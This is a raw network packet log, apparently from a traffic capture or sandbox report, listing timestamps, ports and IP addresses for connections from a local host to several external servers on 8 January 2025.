Jan 8, 2025 11:41:12.400763988 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.400813103 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.400816917 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.401091099 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.401160955 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.401174068 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.401210070 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.401215076 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.401232958 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.401257992 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.401331902 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.401345015 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.401376009 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.401382923 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.401402950 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.401420116 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.485984087 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486001968 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486077070 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.486083031 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486116886 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.486315966 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486335993 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486371994 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.486381054 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486529112 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.486655951 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486670971 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486720085 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.486725092 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486901999 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486921072 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486947060 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.486952066 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.486975908 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.487003088 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.487234116 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.487246037 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.487306118 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.487310886 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.487479925 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.487545013 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.487564087 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.487617016 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.487622023 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.487766981 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.487823009 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.487840891 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.487873077 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.487878084 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.487900019 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.487905979 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.488202095 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.488218069 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.488276005 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.488281965 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.493848085 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.572817087 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.572839975 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.572889090 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.572892904 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.572936058 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.573169947 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.573183060 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.573215008 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.573220015 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.573242903 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.573486090 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.573502064 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.573515892 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.573560953 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.573565960 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.573723078 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.573839903 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.573853016 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.573887110 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.573890924 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.573916912 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.573921919 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.574075937 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.574095011 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.574124098 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.574127913 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.574157000 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.574171066 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.574515104 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.574527025 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.574599028 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.574604988 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.574713945 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.574733019 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.574764967 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.574769974 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.574779034 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.574805975 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.575123072 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.575135946 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.575197935 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.575201988 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.575342894 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.659687042 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.659703970 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.659764051 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.659770966 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.659806967 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.659985065 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.660002947 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.660037041 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.660042048 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.660069942 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.660075903 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.660320044 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.660332918 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.660386086 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.660391092 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.660470009 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.660671949 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.660686016 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.660733938 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.660737991 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661067009 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661088943 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661124945 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.661125898 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661135912 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661148071 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.661180019 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.661416054 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661428928 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661470890 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.661475897 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661488056 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.661763906 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661781073 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661814928 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.661820889 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.661849022 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.712163925 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.714072943 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.714086056 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.714126110 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.714131117 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.714162111 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.714236021 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.746695042 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.746707916 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.746762991 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.746768951 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.746802092 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.746802092 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.747010946 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.747025013 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.747064114 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.747070074 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.747092962 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.747098923 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.747319937 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.747333050 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.747380018 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.747384071 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.747399092 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.747411013 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.747716904 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.747730970 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.747777939 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.747783899 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.747832060 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.748003960 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.748016119 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.748073101 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.748078108 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.748264074 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.748281002 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.748281002 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.748295069 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.748311043 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.748336077 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.748676062 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.748687983 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.748735905 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.748742104 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.753835917 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.800851107 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.800865889 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.800967932 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.800976038 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.801076889 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.833502054 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.833515882 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.833564043 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.833570004 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.833748102 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.833801031 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.833813906 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.833853006 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.833858013 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.833882093 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.833888054 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.834086895 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.834103107 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.834132910 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.834136963 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.834161997 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.834170103 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.834538937 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.834553003 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.834597111 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.834603071 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.834711075 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.834727049 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.834754944 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.834759951 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.834778070 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.834790945 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.835232973 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.835248947 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.835298061 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.835303068 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.835458040 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.835474968 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.835503101 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.835506916 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.835531950 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.835555077 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.887655020 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.887677908 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.887765884 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.887770891 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.887799025 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.887804985 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.920298100 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.920312881 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.920344114 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.920351028 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.920372009 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.920392036 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.920695066 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.920718908 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.920742989 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.920747995 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.920797110 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.920797110 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.920922041 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.920938969 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.921020031 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.921020031 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.921029091 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.921139956 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.921295881 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.921309948 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.921341896 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.921346903 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.921376944 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.921385050 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.921475887 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.921516895 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.921521902 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.921530962 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.921542883 CET	443	49737	185.199.109.133	192.168.2.4
Jan 8, 2025 11:41:12.921580076 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:12.921845913 CET	49737	443	192.168.2.4	185.199.109.133
Jan 8, 2025 11:41:13.112550020 CET	49739	443	192.168.2.4	104.21.95.99
Jan 8, 2025 11:41:13.112584114 CET	443	49739	104.21.95.99	192.168.2.4
Jan 8, 2025 11:41:13.112847090 CET	49739	443	192.168.2.4	104.21.95.99
Jan 8, 2025 11:41:13.121107101 CET	49739	443	192.168.2.4	104.21.95.99
Jan 8, 2025 11:41:13.121120930 CET	443	49739	104.21.95.99	192.168.2.4
Jan 8, 2025 11:41:13.598341942 CET	443	49739	104.21.95.99	192.168.2.4
Jan 8, 2025 11:41:13.598408937 CET	49739	443	192.168.2.4	104.21.95.99
Jan 8, 2025 11:41:13.639834881 CET	49739	443	192.168.2.4	104.21.95.99
Jan 8, 2025 11:41:13.639858007 CET	443	49739	104.21.95.99	192.168.2.4
Jan 8, 2025 11:41:13.640081882 CET	443	49739	104.21.95.99	192.168.2.4
Jan 8, 2025 11:41:13.650253057 CET	49739	443	192.168.2.4	104.21.95.99
Jan 8, 2025 11:41:13.695333004 CET	443	49739	104.21.95.99	192.168.2.4
Jan 8, 2025 11:41:13.896682978 CET	443	49739	104.21.95.99	192.168.2.4
Jan 8, 2025 11:41:13.896755934 CET	443	49739	104.21.95.99	192.168.2.4
Jan 8, 2025 11:41:13.896807909 CET	49739	443	192.168.2.4	104.21.95.99
Jan 8, 2025 11:41:13.898475885 CET	49739	443	192.168.2.4	104.21.95.99
Jan 8, 2025 11:41:13.926237106 CET	49741	80	192.168.2.4	206.189.156.69
Jan 8, 2025 11:41:13.931054115 CET	80	49741	206.189.156.69	192.168.2.4
Jan 8, 2025 11:41:13.931112051 CET	49741	80	192.168.2.4	206.189.156.69
Jan 8, 2025 11:41:13.931591988 CET	49741	80	192.168.2.4	206.189.156.69
Jan 8, 2025 11:41:13.936338902 CET	80	49741	206.189.156.69	192.168.2.4
Jan 8, 2025 11:41:14.846817970 CET	80	49741	206.189.156.69	192.168.2.4
Jan 8, 2025 11:41:14.977817059 CET	49741	80	192.168.2.4	206.189.156.69
Jan 8, 2025 11:41:16.371596098 CET	49741	80	192.168.2.4	206.189.156.69
Jan 8, 2025 11:41:17.713882923 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:17.854701996 CET	49735	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:21.063515902 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:21.063565969 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:21.063836098 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:21.064198971 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:21.064224005 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:21.912456036 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:21.973031998 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:21.973047018 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:21.974570036 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:21.974585056 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:21.974639893 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:22.009037018 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:22.009134054 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:22.087201118 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:22.087209940 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:22.274729013 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:22.274740934 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:22.384072065 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:27.741730928 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:27.745606899 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:27.807177067 CET	49735	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:27.884090900 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:38.165416002 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:38.166835070 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:38.290361881 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:38.368491888 CET	49735	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:48.247304916 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:48.256318092 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:48.290374041 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:48.384156942 CET	49735	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:58.284758091 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:58.286478996 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:41:58.368498087 CET	49735	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:41:58.384109974 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:42:08.845676899 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:42:08.872082949 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:42:08.915374041 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:42:08.954169035 CET	49735	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:42:18.877095938 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:42:18.883809090 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:42:18.931004047 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:42:18.931010008 CET	49735	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:42:28.925731897 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:42:28.942884922 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:42:28.987010956 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:42:29.061860085 CET	49735	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:42:40.228893042 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:42:40.240478039 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:42:40.274754047 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:42:40.368515015 CET	49735	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:42:53.227425098 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:42:53.254757881 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:42:53.278953075 CET	49746	443	192.168.2.4	141.94.96.144
